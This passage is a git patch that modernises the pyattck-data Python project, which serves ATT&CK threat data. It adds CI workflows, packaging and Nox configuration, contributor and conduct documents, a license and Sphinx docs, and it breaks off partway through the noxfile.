From d179da49c808e2b2772caadd425808da83e432a3 Mon Sep 17 00:00:00 2001 From: MSAdministrator Date: Thu, 9 Jun 2022 13:46:40 -0500 Subject: [PATCH 1/4] dev: Complete update --- .github/dependabot.yml | 18 + .github/labels.yml | 66 + .github/release-drafter.yml | 29 + .github/workflows/constraints.txt | 5 + .github/workflows/generatepyattckdata.yml | 17 +- .github/workflows/labeler.yml | 19 + .github/workflows/release.yml | 68 + .github/workflows/tests.yml | 143 ++ CODE_OF_CONDUCT.rst | 105 + CONTRIBUTING.rst | 123 + LICENSE.rst | 22 + README.md | 21 +- codecov.yml | 9 + docs/codeofconduct.rst | 1 + docs/conf.py | 14 + docs/contributing.rst | 4 + docs/index.rst | 16 + docs/license.rst | 1 + docs/reference.rst | 9 + docs/requirements.txt | 3 + docs/usage.rst | 6 + noxfile.py | 205 ++ poetry.lock | 2139 +++++++++++++++++ pyattck_data/__init__.py | 2 - pyproject.toml | 83 + src/pyattck_data/__init__.py | 2 + src/pyattck_data/__main__.py | 12 + {pyattck_data => src/pyattck_data}/base.py | 2 +- .../pyattck_data}/data/conversion.json | 0 .../pyattck_data}/generatenistdata.py | 0 .../pyattck_data}/githubcontroller.py | 0 .../pyattck_data}/markdowntable.py | 0 src/pyattck_data/models/__init__.py | 0 src/pyattck_data/models/actor.py | 91 + src/pyattck_data/models/attack.py | 73 + src/pyattck_data/models/base.py | 74 + src/pyattck_data/models/control.py | 33 + src/pyattck_data/models/datacomponent.py | 44 + src/pyattck_data/models/datasource.py | 58 + src/pyattck_data/models/definition.py | 34 + src/pyattck_data/models/generated.py | 299 +++ src/pyattck_data/models/identity.py | 26 + src/pyattck_data/models/malware.py | 123 + src/pyattck_data/models/matrix.py | 33 + src/pyattck_data/models/mitigation.py | 49 + src/pyattck_data/models/nist.py | 74 + src/pyattck_data/models/py.typed | 0 src/pyattck_data/models/relationship.py | 27 + src/pyattck_data/models/tactic.py | 53 + src/pyattck_data/models/technique.py | 156 ++ src/pyattck_data/models/tool.py | 125 + src/pyattck_data/models/types.py | 165 ++ .../pyattck_data}/pyattckdata.py | 2 +- .../pyattck_data}/services/__init__.py | 0 .../services/adversaryemulation.py | 0 .../services/aptthreattracking.py | 2 +- .../pyattck_data}/services/atomicredteam.py | 0 .../services/atomicthreatcoverage.py | 0 .../services/attckdatasources.py | 0 .../pyattck_data}/services/attckempire.py | 0 .../pyattck_data}/services/blueteamlabs.py | 0 .../pyattck_data}/services/c2matrix.py | 0 .../pyattck_data}/services/elemental.py | 0 .../pyattck_data}/services/litmustest.py | 0 .../services/macosattackdataset.py | 0 .../services/malwarearchaeology.py | 0 .../services/newbeeattackdata.py | 0 .../pyattck_data}/services/nsmattck.py | 0 .../pyattck_data}/services/osqueryattack.py | 0 .../pyattck_data}/services/stockpile.py | 0 .../pyattck_data}/services/sysmonhunter.py | 0 .../services/threathuntingbook.py | 0 .../services/threathuntingtables.py | 0 tests/__init__.py | 1 + tests/test_each_model.py | 53 + tests/test_generated_methods.py | 264 ++ tests/test_main.py | 17 + tests/test_models.py | 120 + tests/test_types.py | 63 + 79 files changed, 5191 insertions(+), 12 deletions(-) create mode 100644 .github/dependabot.yml create mode 100644 .github/labels.yml create mode 100644 .github/release-drafter.yml create mode 100644 .github/workflows/constraints.txt create mode 100644 .github/workflows/labeler.yml create mode 100644 .github/workflows/release.yml create mode 100644 .github/workflows/tests.yml create mode 100644 CODE_OF_CONDUCT.rst create mode 100644 CONTRIBUTING.rst create mode 100644 LICENSE.rst create mode 100644 codecov.yml create mode 100644 docs/codeofconduct.rst create mode 100644 docs/conf.py create mode 100644 docs/contributing.rst create mode 100644 docs/index.rst create mode 100644 docs/license.rst create mode 100644 docs/reference.rst create mode 100644 docs/requirements.txt create mode 100644 docs/usage.rst create mode 100644 noxfile.py create mode 100644 poetry.lock delete mode 100644 pyattck_data/__init__.py create mode 100644 pyproject.toml create mode 100644 src/pyattck_data/__init__.py create mode 100644 src/pyattck_data/__main__.py rename {pyattck_data => src/pyattck_data}/base.py (83%) rename {pyattck_data => src/pyattck_data}/data/conversion.json (100%) rename {pyattck_data => src/pyattck_data}/generatenistdata.py (100%) rename {pyattck_data => src/pyattck_data}/githubcontroller.py (100%) rename {pyattck_data => src/pyattck_data}/markdowntable.py (100%) create mode 100644 src/pyattck_data/models/__init__.py create mode 100644 src/pyattck_data/models/actor.py create mode 100644 src/pyattck_data/models/attack.py create mode 100644 src/pyattck_data/models/base.py create mode 100644 src/pyattck_data/models/control.py create mode 100644 src/pyattck_data/models/datacomponent.py create mode 100644 src/pyattck_data/models/datasource.py create mode 100644 src/pyattck_data/models/definition.py create mode 100644 src/pyattck_data/models/generated.py create mode 100644 src/pyattck_data/models/identity.py create mode 100644 src/pyattck_data/models/malware.py create mode 100644 src/pyattck_data/models/matrix.py create mode 100644 src/pyattck_data/models/mitigation.py create mode 100644 src/pyattck_data/models/nist.py create mode 100644 src/pyattck_data/models/py.typed create mode 100644 src/pyattck_data/models/relationship.py create mode 100644 src/pyattck_data/models/tactic.py create mode 100644 src/pyattck_data/models/technique.py create mode 100644 src/pyattck_data/models/tool.py create mode 100644 src/pyattck_data/models/types.py rename {pyattck_data => src/pyattck_data}/pyattckdata.py (100%) rename {pyattck_data => src/pyattck_data}/services/__init__.py (100%) rename {pyattck_data => src/pyattck_data}/services/adversaryemulation.py (100%) rename {pyattck_data => src/pyattck_data}/services/aptthreattracking.py (99%) rename {pyattck_data => src/pyattck_data}/services/atomicredteam.py (100%) rename {pyattck_data => src/pyattck_data}/services/atomicthreatcoverage.py (100%) rename {pyattck_data => src/pyattck_data}/services/attckdatasources.py (100%) rename {pyattck_data => src/pyattck_data}/services/attckempire.py (100%) rename {pyattck_data => src/pyattck_data}/services/blueteamlabs.py (100%) rename {pyattck_data => src/pyattck_data}/services/c2matrix.py (100%) rename {pyattck_data => src/pyattck_data}/services/elemental.py (100%) rename {pyattck_data => src/pyattck_data}/services/litmustest.py (100%) rename {pyattck_data => src/pyattck_data}/services/macosattackdataset.py (100%) rename {pyattck_data => src/pyattck_data}/services/malwarearchaeology.py (100%) rename {pyattck_data => src/pyattck_data}/services/newbeeattackdata.py (100%) rename {pyattck_data => src/pyattck_data}/services/nsmattck.py (100%) rename {pyattck_data => src/pyattck_data}/services/osqueryattack.py (100%) rename {pyattck_data => src/pyattck_data}/services/stockpile.py (100%) rename {pyattck_data => src/pyattck_data}/services/sysmonhunter.py (100%) rename {pyattck_data => src/pyattck_data}/services/threathuntingbook.py (100%) rename {pyattck_data => src/pyattck_data}/services/threathuntingtables.py (100%) create mode 100644 tests/__init__.py create mode 100644 tests/test_each_model.py create mode 100644 tests/test_generated_methods.py create mode 100644 tests/test_main.py create mode 100644 tests/test_models.py create mode 100644 tests/test_types.py diff --git a/.github/dependabot.yml b/.github/dependabot.yml new file mode 100644 index 0000000..a0a5c73 --- /dev/null +++ b/.github/dependabot.yml @@ -0,0 +1,18 @@ +version: 2 +updates: + - package-ecosystem: github-actions + directory: "/" + schedule: + interval: daily + - package-ecosystem: pip + directory: "/.github/workflows" + schedule: + interval: daily + - package-ecosystem: pip + directory: "/docs" + schedule: + interval: daily + - package-ecosystem: pip + directory: "/" + schedule: + interval: daily diff --git a/.github/labels.yml b/.github/labels.yml new file mode 100644 index 0000000..f7f83aa --- /dev/null +++ b/.github/labels.yml @@ -0,0 +1,66 @@ +--- +# Labels names are important as they are used by Release Drafter to decide +# regarding where to record them in changelog or if to skip them. +# +# The repository labels will be automatically configured using this file and +# the GitHub Action https://github.com/marketplace/actions/github-labeler. +- name: breaking + description: Breaking Changes + color: bfd4f2 +- name: bug + description: Something isn't working + color: d73a4a +- name: build + description: Build System and Dependencies + color: bfdadc +- name: ci + description: Continuous Integration + color: 4a97d6 +- name: dependencies + description: Pull requests that update a dependency file + color: 0366d6 +- name: documentation + description: Improvements or additions to documentation + color: 0075ca +- name: duplicate + description: This issue or pull request already exists + color: cfd3d7 +- name: enhancement + description: New feature or request + color: a2eeef +- name: github_actions + description: Pull requests that update Github_actions code + color: "000000" +- name: good first issue + description: Good for newcomers + color: 7057ff +- name: help wanted + description: Extra attention is needed + color: 008672 +- name: invalid + description: This doesn't seem right + color: e4e669 +- name: performance + description: Performance + color: "016175" +- name: python + description: Pull requests that update Python code + color: 2b67c6 +- name: question + description: Further information is requested + color: d876e3 +- name: refactoring + description: Refactoring + color: ef67c4 +- name: removal + description: Removals and Deprecations + color: 9ae7ea +- name: style + description: Style + color: c120e5 +- name: testing + description: Testing + color: b1fc6f +- name: wontfix + description: This will not be worked on + color: ffffff diff --git a/.github/release-drafter.yml b/.github/release-drafter.yml new file mode 100644 index 0000000..7a04410 --- /dev/null +++ b/.github/release-drafter.yml @@ -0,0 +1,29 @@ +categories: + - title: ":boom: Breaking Changes" + label: "breaking" + - title: ":rocket: Features" + label: "enhancement" + - title: ":fire: Removals and Deprecations" + label: "removal" + - title: ":beetle: Fixes" + label: "bug" + - title: ":racehorse: Performance" + label: "performance" + - title: ":rotating_light: Testing" + label: "testing" + - title: ":construction_worker: Continuous Integration" + label: "ci" + - title: ":books: Documentation" + label: "documentation" + - title: ":hammer: Refactoring" + label: "refactoring" + - title: ":lipstick: Style" + label: "style" + - title: ":package: Dependencies" + labels: + - "dependencies" + - "build" +template: | + ## Changes + + $CHANGES diff --git a/.github/workflows/constraints.txt b/.github/workflows/constraints.txt new file mode 100644 index 0000000..906d5b6 --- /dev/null +++ b/.github/workflows/constraints.txt @@ -0,0 +1,5 @@ +pip==22.1.1 +nox==2022.1.7 +nox-poetry==1.0.0 +poetry==1.1.13 +virtualenv==20.14.1 diff --git a/.github/workflows/generatepyattckdata.yml b/.github/workflows/generatepyattckdata.yml index 336a30f..473487e 100644 --- a/.github/workflows/generatepyattckdata.yml +++ b/.github/workflows/generatepyattckdata.yml @@ -16,20 +16,27 @@ jobs: contents: write steps: - - uses: actions/checkout@v2 + - uses: actions/checkout@v2.4.0 - name: Set up Python Environment - uses: actions/setup-python@v1 + uses: actions/setup-python@v2.3.0 with: python-version: 3.8 + - name: Upgrade pip + run: | + pip install --constraint=.github/workflows/constraints.txt pip + pip --version + - name: Install Poetry + run: | + pip install --constraint=.github/workflows/constraints.txt poetry + poetry --version - name: Install dependencies run: | - python -m pip install --upgrade pip - pip install -U -r requirements.txt + poetry install - name: Generate ATTCK Data env: GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: | - python run.py + poetry run python run.py - name: Configure AWS Credentials uses: aws-actions/configure-aws-credentials@v1 with: diff --git a/.github/workflows/labeler.yml b/.github/workflows/labeler.yml new file mode 100644 index 0000000..f39cfa6 --- /dev/null +++ b/.github/workflows/labeler.yml @@ -0,0 +1,19 @@ +name: Labeler + +on: + push: + branches: + - main + - master + +jobs: + labeler: + runs-on: ubuntu-latest + steps: + - name: Check out the repository + uses: actions/checkout@v3.0.2 + + - name: Run Labeler + uses: crazy-max/ghaction-github-labeler@v3.1.1 + with: + skip-delete: true diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml new file mode 100644 index 0000000..eb8d835 --- /dev/null +++ b/.github/workflows/release.yml @@ -0,0 +1,68 @@ +name: Release + +on: + push: + branches: + - main + +jobs: + release: + name: Release + runs-on: ubuntu-latest + steps: + - name: Check out the repository + uses: actions/checkout@v3.0.2 + with: + fetch-depth: 2 + + - name: Set up Python + uses: actions/setup-python@v2.3.0 + with: + python-version: "3.10" + + - name: Upgrade pip + run: | + pip install --constraint=.github/workflows/constraints.txt pip + pip --version + + - name: Install Poetry + run: | + pip install --constraint=.github/workflows/constraints.txt poetry + poetry --version + + - name: Check if there is a parent commit + id: check-parent-commit + run: | + echo "::set-output name=sha::$(git rev-parse --verify --quiet HEAD^)" + + - name: Detect and tag new version + id: check-version + if: steps.check-parent-commit.outputs.sha + uses: salsify/action-detect-and-tag-new-version@v2.0.1 + with: + version-command: | + bash -o pipefail -c "poetry version | awk '{ print \$2 }'" + + - name: Bump version for release + if: "! steps.check-version.outputs.tag" + run: | + poetry version patch && + version=$(poetry version | awk '{ print $2 }') && + poetry version $version + + - name: Build package + run: | + poetry build --ansi + + - name: Publish package on PyPI + run: | + poetry config http-basic.pypi ${{ secrets.PYPI_USERNAME }} ${{ secrets.PYPI_PASSWORD }} + poetry publish + + - name: Publish the release notes + uses: release-drafter/release-drafter@v5.20.0 + with: + publish: ${{ steps.check-version.outputs.tag != '' }} + tag: ${{ steps.check-version.outputs.tag }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} diff --git a/.github/workflows/tests.yml b/.github/workflows/tests.yml new file mode 100644 index 0000000..0168128 --- /dev/null +++ b/.github/workflows/tests.yml @@ -0,0 +1,143 @@ +name: Tests + +on: + - push + - pull_request + +jobs: + tests: + name: ${{ matrix.session }} ${{ matrix.python }} / ${{ matrix.os }} + runs-on: ${{ matrix.os }} + strategy: + fail-fast: false + matrix: + include: + - { python: "3.10", os: "ubuntu-latest", session: "tests" } + - { python: "3.9", os: "ubuntu-latest", session: "tests" } + - { python: "3.8", os: "ubuntu-latest", session: "tests" } + - { python: "3.7", os: "ubuntu-latest", session: "tests" } + + env: + NOXSESSION: ${{ matrix.session }} + FORCE_COLOR: "1" + PRE_COMMIT_COLOR: "always" + + steps: + - name: Check out the repository + uses: actions/checkout@v2.4.0 + + - name: Set up Python ${{ matrix.python }} + uses: actions/setup-python@v2.3.0 + with: + python-version: ${{ matrix.python }} + + - name: Upgrade pip + run: | + pip install --constraint=.github/workflows/constraints.txt pip + pip --version + + - name: Upgrade pip in virtual environments + shell: python + run: | + import os + import pip + + with open(os.environ["GITHUB_ENV"], mode="a") as io: + print(f"VIRTUALENV_PIP={pip.__version__}", file=io) + + - name: Install Poetry + run: | + pipx install --pip-args=--constraint=.github/workflows/constraints.txt poetry + poetry --version + + - name: Install Nox + run: | + pipx install --pip-args=--constraint=.github/workflows/constraints.txt nox + pipx inject --pip-args=--constraint=.github/workflows/constraints.txt nox nox-poetry + nox --version + + - name: Compute pre-commit cache key + if: matrix.session == 'pre-commit' + id: pre-commit-cache + shell: python + run: | + import hashlib + import sys + + python = "py{}.{}".format(*sys.version_info[:2]) + payload = sys.version.encode() + sys.executable.encode() + digest = hashlib.sha256(payload).hexdigest() + result = "${{ runner.os }}-{}-{}-pre-commit".format(python, digest[:8]) + + print("::set-output name=result::{}".format(result)) + + - name: Restore pre-commit cache + uses: actions/cache@v2.1.7 + if: matrix.session == 'pre-commit' + with: + path: ~/.cache/pre-commit + key: ${{ steps.pre-commit-cache.outputs.result }}-${{ hashFiles('.pre-commit-config.yaml') }} + restore-keys: | + ${{ steps.pre-commit-cache.outputs.result }}- + + - name: Run Nox + run: | + nox --force-color --python=${{ matrix.python }} + + - name: Upload coverage data + if: always() && matrix.session == 'tests' + uses: "actions/upload-artifact@v2.2.4" + with: + name: coverage-data + path: ".coverage.*" + + - name: Upload documentation + if: matrix.session == 'docs-build' + uses: actions/upload-artifact@v2.2.4 + with: + name: docs + path: docs/_build + + coverage: + runs-on: ubuntu-latest + needs: tests + steps: + - name: Check out the repository + uses: actions/checkout@v2.4.0 + + - name: Set up Python + uses: actions/setup-python@v2.3.0 + with: + python-version: "3.10" + + - name: Upgrade pip + run: | + pip install --constraint=.github/workflows/constraints.txt pip + pip --version + + - name: Install Poetry + run: | + pipx install --pip-args=--constraint=.github/workflows/constraints.txt poetry + poetry --version + + - name: Install Nox + run: | + pipx install --pip-args=--constraint=.github/workflows/constraints.txt nox + pipx inject --pip-args=--constraint=.github/workflows/constraints.txt nox nox-poetry + nox --version + + - name: Download coverage data + uses: actions/download-artifact@v2.0.10 + with: + name: coverage-data + + - name: Combine coverage data and display human readable report + run: | + nox --force-color --session=coverage + + - name: Create coverage report + run: | + nox --force-color --session=coverage -- xml + + - name: Upload coverage report + uses: codecov/codecov-action@v2.1.0 diff --git a/CODE_OF_CONDUCT.rst b/CODE_OF_CONDUCT.rst new file mode 100644 index 0000000..c6935f8 --- /dev/null +++ b/CODE_OF_CONDUCT.rst @@ -0,0 +1,105 @@ +Contributor Covenant Code of Conduct +==================================== + +Our Pledge +---------- + +We as members, contributors, and leaders pledge to make participation in our community a harassment-free experience for everyone, regardless of age, body size, visible or invisible disability, ethnicity, sex characteristics, gender identity and expression, level of experience, education, socio-economic status, nationality, personal appearance, race, religion, or sexual identity and orientation. + +We pledge to act and interact in ways that contribute to an open, welcoming, diverse, inclusive, and healthy community. + + +Our Standards +------------- + +Examples of behavior that contributes to a positive environment for our community include: + +- Demonstrating empathy and kindness toward other people +- Being respectful of differing opinions, viewpoints, and experiences +- Giving and gracefully accepting constructive feedback +- Accepting responsibility and apologizing to those affected by our mistakes, and learning from the experience +- Focusing on what is best not just for us as individuals, but for the overall community + +Examples of unacceptable behavior include: + +- The use of sexualized language or imagery, and sexual attention or + advances of any kind +- Trolling, insulting or derogatory comments, and personal or political attacks +- Public or private harassment +- Publishing others' private information, such as a physical or email + address, without their explicit permission +- Other conduct which could reasonably be considered inappropriate in a + professional setting + +Enforcement Responsibilities +---------------------------- + +Community leaders are responsible for clarifying and enforcing our standards of acceptable behavior and will take appropriate and fair corrective action in response to any behavior that they deem inappropriate, threatening, offensive, or harmful. + +Community leaders have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, and will communicate reasons for moderation decisions when appropriate. + + +Scope +----- + +This Code of Conduct applies within all community spaces, and also applies when an individual is officially representing the community in public spaces. Examples of representing our community include using an official e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. + + +Enforcement +----------- + +Instances of abusive, harassing, or otherwise unacceptable behavior may be reported to the community leaders responsible for enforcement at info@swimlane.com. All complaints will be reviewed and investigated promptly and fairly. + +All community leaders are obligated to respect the privacy and security of the reporter of any incident. + + +Enforcement Guidelines +---------------------- + +Community leaders will follow these Community Impact Guidelines in determining the consequences for any action they deem in violation of this Code of Conduct: + + +1. Correction +~~~~~~~~~~~~~ + +**Community Impact**: Use of inappropriate language or other behavior deemed unprofessional or unwelcome in the community. + +**Consequence**: A private, written warning from community leaders, providing clarity around the nature of the violation and an explanation of why the behavior was inappropriate. A public apology may be requested. + + +2. Warning +~~~~~~~~~~ + +**Community Impact**: A violation through a single incident or series of actions. + +**Consequence**: A warning with consequences for continued behavior. No interaction with the people involved, including unsolicited interaction with those enforcing the Code of Conduct, for a specified period of time. This includes avoiding interactions in community spaces as well as external channels like social media. Violating these terms may lead to a temporary or permanent ban. + + +3. Temporary Ban +~~~~~~~~~~~~~~~~ + +**Community Impact**: A serious violation of community standards, including sustained inappropriate behavior. + +**Consequence**: A temporary ban from any sort of interaction or public communication with the community for a specified period of time. No public or private interaction with the people involved, including unsolicited interaction with those enforcing the Code of Conduct, is allowed during this period. Violating these terms may lead to a permanent ban. + + +4. Permanent Ban +~~~~~~~~~~~~~~~~ + +**Community Impact**: Demonstrating a pattern of violation of community standards, including sustained inappropriate behavior, harassment of an individual, or aggression toward or disparagement of classes of individuals. + +**Consequence**: A permanent ban from any sort of public interaction within the community. + + +Attribution +----------- + +This Code of Conduct is adapted from the `Contributor Covenant `__, version 2.0, +available at https://www.contributor-covenant.org/version/2/0/code_of_conduct.html. + +Community Impact Guidelines were inspired by `Mozilla’s code of conduct enforcement ladder `__. + +.. _homepage: https://www.contributor-covenant.org + +For answers to common questions about this code of conduct, see the FAQ at +https://www.contributor-covenant.org/faq. Translations are available at https://www.contributor-covenant.org/translations. diff --git a/CONTRIBUTING.rst b/CONTRIBUTING.rst new file mode 100644 index 0000000..8027b29 --- /dev/null +++ b/CONTRIBUTING.rst @@ -0,0 +1,123 @@ +Contributor Guide +================= + +Thank you for your interest in improving this project. +This project is open-source under the `MIT license`_ and +welcomes contributions in the form of bug reports, feature requests, and pull requests. + +Here is a list of important resources for contributors: + +- `Source Code`_ +- `Documentation`_ +- `Issue Tracker`_ +- `Code of Conduct`_ + +.. _MIT license: https://opensource.org/licenses/MIT +.. _Source Code: https://github.com/MSAdministrator/pyattck-data-models +.. _Documentation: https://pyattck-data-models.readthedocs.io/ +.. _Issue Tracker: https://github.com/MSAdministrator/pyattck-data-models/issues + +How to report a bug +------------------- + +Report bugs on the `Issue Tracker`_. + +When filing an issue, make sure to answer these questions: + +- Which operating system and Python version are you using? +- Which version of this project are you using? +- What did you do? +- What did you expect to see? +- What did you see instead? + +The best way to get your bug fixed is to provide a test case, +and/or steps to reproduce the issue. + + +How to request a feature +------------------------ + +Request features on the `Issue Tracker`_. + + +How to set up your development environment +------------------------------------------ + +You need Python 3.7+ and the following tools: + +- Poetry_ +- Nox_ +- nox-poetry_ + +Install the package with development requirements: + +.. code:: console + + $ poetry install + +You can now run an interactive Python session, +or the command-line interface: + +.. code:: console + + $ poetry run python + $ poetry run pyattck-data-models + +.. _Poetry: https://python-poetry.org/ +.. _Nox: https://nox.thea.codes/ +.. _nox-poetry: https://nox-poetry.readthedocs.io/ + + +How to test the project +----------------------- + +Run the full test suite: + +.. code:: console + + $ nox + +List the available Nox sessions: + +.. code:: console + + $ nox --list-sessions + +You can also run a specific Nox session. +For example, invoke the unit test suite like this: + +.. code:: console + + $ nox --session=tests + +Unit tests are located in the ``tests`` directory, +and are written using the pytest_ testing framework. + +.. _pytest: https://pytest.readthedocs.io/ + + +How to submit changes +--------------------- + +Open a `pull request`_ to submit changes to this project. + +Your pull request needs to meet the following guidelines for acceptance: + +- The Nox test suite must pass without errors and warnings. +- Include unit tests. This project maintains 100% code coverage. +- If your changes add functionality, update the documentation accordingly. + +Feel free to submit early, though—we can always iterate on this. + +To run linting and code formatting checks before committing your change, you can install pre-commit as a Git hook by running the following command: + +.. code:: console + + $ nox --session=pre-commit -- install + +It is recommended to open an issue before starting work on anything. +This will allow a chance to talk it over with the owners and validate your approach. + +.. _pull request: https://github.com/MSAdministrator/pyattck-data-models/pulls +.. github-only +.. _Code of Conduct: CODE_OF_CONDUCT.rst diff --git a/LICENSE.rst b/LICENSE.rst new file mode 100644 index 0000000..0012eec --- /dev/null +++ b/LICENSE.rst @@ -0,0 +1,22 @@ +MIT License +=========== + +Copyright © 2022 Swimlane + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +**The software is provided "as is", without warranty of any kind, express or +implied, including but not limited to the warranties of merchantability, +fitness for a particular purpose and noninfringement. In no event shall the +authors or copyright holders be liable for any claim, damages or other +liability, whether in an action of contract, tort or otherwise, arising from, +out of or in connection with the software or the use or other dealings in the +software.** diff --git a/README.md b/README.md index 584cfaa..007f7e8 100644 --- a/README.md +++ b/README.md @@ -1,10 +1,26 @@ # pyattck-data -[![Generate ATT&CK Data](https://github.com/swimlane/pyattck-data/actions/workflows/generatepyattckdata.yml/badge.svg)](https://github.com/swimlane/pyattck-data/actions/workflows/generatepyattckdata.yml) +PyPI +Status +Python Version +License +Tests +Codecov +pre-commit +Black + +# + +## Features + +Includes data models for the following projects: + +* [pyattck](https://github.com/swimlane/pyattck/) + This repository contains generated contextual data utilized by pyattck. -# Data Access +## Generated Data Access Generated data can be retrieved from the following URLs: @@ -17,6 +33,7 @@ Generated data can be retrieved from the following URLs: * generated_attck_data.json - [https://swimlane-pyattck.s3.us-west-2.amazonaws.com/generated_attck_data.json](https://swimlane-pyattck.s3.us-west-2.amazonaws.com/generated_attck_data.json) * generated_attck_data_v2.json - [https://swimlane-pyattck.s3.us-west-2.amazonaws.com/generated_attck_data_v2.json](https://swimlane-pyattck.s3.us-west-2.amazonaws.com/generated_attck_data_v2.json) + # Generated ATT&CK Datasets This page outlines and provides detailed information regarding the data generated and used with the `pyattck` python package. diff --git a/codecov.yml b/codecov.yml new file mode 100644 index 0000000..bf5a91b --- /dev/null +++ b/codecov.yml @@ -0,0 +1,9 @@ +comment: false +coverage: + status: + project: + default: + target: "65" + patch: + default: + target: "65" diff --git a/docs/codeofconduct.rst b/docs/codeofconduct.rst new file mode 100644 index 0000000..96e0ba2 --- /dev/null +++ b/docs/codeofconduct.rst @@ -0,0 +1 @@ +.. include:: ../CODE_OF_CONDUCT.rst diff --git a/docs/conf.py b/docs/conf.py new file mode 100644 index 0000000..a68a9df --- /dev/null +++ b/docs/conf.py @@ -0,0 +1,14 @@ +"""Sphinx configuration.""" +from datetime import datetime + + +project = "Pyattck Data" +author = "Swimlane" +copyright = f"{datetime.now().year}, {author}" +extensions = [ + "sphinx.ext.autodoc", + "sphinx.ext.napoleon", + "sphinx_click", +] +autodoc_typehints = "description" +html_theme = "furo" diff --git a/docs/contributing.rst b/docs/contributing.rst new file mode 100644 index 0000000..c8670b6 --- /dev/null +++ b/docs/contributing.rst @@ -0,0 +1,4 @@ +.. include:: ../CONTRIBUTING.rst + :end-before: github-only + +.. _Code of Conduct: codeofconduct.html diff --git a/docs/index.rst b/docs/index.rst new file mode 100644 index 0000000..5c575d4 --- /dev/null +++ b/docs/index.rst @@ -0,0 +1,16 @@ +.. include:: ../README.rst + :end-before: github-only + +.. _Contributor Guide: contributing.html +.. _Usage: usage.html + +.. toctree:: + :hidden: + :maxdepth: 1 + + usage + reference + contributing + Code of Conduct + License + Changelog diff --git a/docs/license.rst b/docs/license.rst new file mode 100644 index 0000000..68c5792 --- /dev/null +++ b/docs/license.rst @@ -0,0 +1 @@ +.. include:: ../LICENSE.rst diff --git a/docs/reference.rst b/docs/reference.rst new file mode 100644 index 0000000..a3d57fe --- /dev/null +++ b/docs/reference.rst @@ -0,0 +1,9 @@ +Reference +========= + + +pyattck_data +------------------- + +.. automodule:: pyattck_data + :members: diff --git a/docs/requirements.txt b/docs/requirements.txt new file mode 100644 index 0000000..ed606f6 --- /dev/null +++ b/docs/requirements.txt @@ -0,0 +1,3 @@ +furo==2022.4.7 +sphinx==4.5.0 +sphinx-click==4.0.3 diff --git a/docs/usage.rst b/docs/usage.rst new file mode 100644 index 0000000..848a07b --- /dev/null +++ b/docs/usage.rst @@ -0,0 +1,6 @@ +Usage +===== + +.. click:: pyattck_data.__main__:main + :prog: pyattck-data + :nested: full diff --git a/noxfile.py b/noxfile.py new file mode 100644 index 0000000..e2367ff --- /dev/null +++ b/noxfile.py @@ -0,0 +1,205 @@ +"""Nox sessions.""" +import os +import shutil +import sys +from pathlib import Path +from textwrap import dedent + +import nox + +try: + from nox_poetry import Session + from nox_poetry import session +except ImportError: + message = f"""\ + Nox failed to import the 'nox-poetry' package. + + Please install it using the following command: + + {sys.executable} -m pip install nox-poetry""" + raise SystemExit(dedent(message)) from None + + +package = "pyattck_data" +python_versions = ["3.10", "3.9", "3.8", "3.7"] +nox.needs_version = ">= 2021.6.6" +nox.options.sessions = ( + "pre-commit", + "safety", + "mypy", + "tests", + "typeguard", + "xdoctest", + "docs-build", +) + + +def activate_virtualenv_in_precommit_hooks(session: Session) -> None: + """Activate virtualenv in hooks installed by pre-commit. + + This function patches git hooks installed by pre-commit to activate the + session's virtual environment. This allows pre-commit to locate hooks in + that environment when invoked from git. + + Args: + session: The Session object. + """ + assert session.bin is not None # noqa: S101 + + virtualenv = session.env.get("VIRTUAL_ENV") + if virtualenv is None: + return + + hookdir = Path(".git") / "hooks" + if not hookdir.is_dir(): + return + + for hook in hookdir.iterdir(): + if hook.name.endswith(".sample") or not hook.is_file(): + continue + + text = hook.read_text() + bindir = repr(session.bin)[1:-1] # strip quotes + if not ( + Path("A") == Path("a") and bindir.lower() in text.lower() or bindir in text + ): + continue + + lines = text.splitlines() + if not (lines[0].startswith("#!") and "python" in lines[0].lower()): + continue + + header = dedent( + f"""\ + import os + os.environ["VIRTUAL_ENV"] = {virtualenv!r} + os.environ["PATH"] = os.pathsep.join(( + {session.bin!r}, + os.environ.get("PATH", ""), + )) + """ + ) + + lines.insert(1, header) + hook.write_text("\n".join(lines)) + + +@session(name="pre-commit", python="3.10") +def precommit(session: Session) -> None: + """Lint using pre-commit.""" + args = session.posargs or ["run", "--all-files", "--show-diff-on-failure"] + session.install( + "black", + "darglint", + "flake8", + "flake8-bandit", + "flake8-bugbear", + "flake8-docstrings", + "flake8-rst-docstrings", + "pep8-naming", + "pre-commit", + "pre-commit-hooks", + "pyupgrade", + "reorder-python-imports", + ) + session.run("pre-commit", *args) + if args and args[0] == "install": + activate_virtualenv_in_precommit_hooks(session) + + +@session(python="3.10") +def safety(session: Session) -> None: + """Scan dependencies for insecure packages.""" + requirements = session.poetry.export_requirements() + session.install("safety") + session.run("safety", "check", "--full-report", f"--file={requirements}") + + +@session(python=python_versions) +def mypy(session: Session) -> None: + """Type-check using mypy.""" + args = session.posargs or ["src", "tests", "docs/conf.py"] + session.install(".") + session.install("mypy", "pytest") + session.run("mypy", *args) + if not session.posargs: + session.run("mypy", f"--python-executable={sys.executable}", "noxfile.py") + + +@session(python=python_versions) +def tests(session: Session) -> None: + """Run the test suite.""" + session.install(".") + session.install("coverage[toml]", "pytest", "pygments", "requests") + try: + session.run("coverage", "run", "--parallel", "-m", "pytest", *session.posargs) + finally: + if session.interactive: + session.notify("coverage", posargs=[]) + + +@session +def coverage(session: Session) -> None: + """Produce the coverage report.""" + args = session.posargs or ["report"] + + session.install("coverage[toml]") + + if not session.posargs and any(Path().glob(".coverage.*")): + session.run("coverage", "combine") + + session.run("coverage", *args) + + +@session(python=python_versions) +def typeguard(session: Session) -> None: + """Runtime type checking using Typeguard.""" + session.install(".") + session.install("pytest", "typeguard", "pygments") + session.run("pytest", f"--typeguard-packages={package}", *session.posargs) + + +@session(python=python_versions) +def xdoctest(session: Session) -> None: + """Run examples with 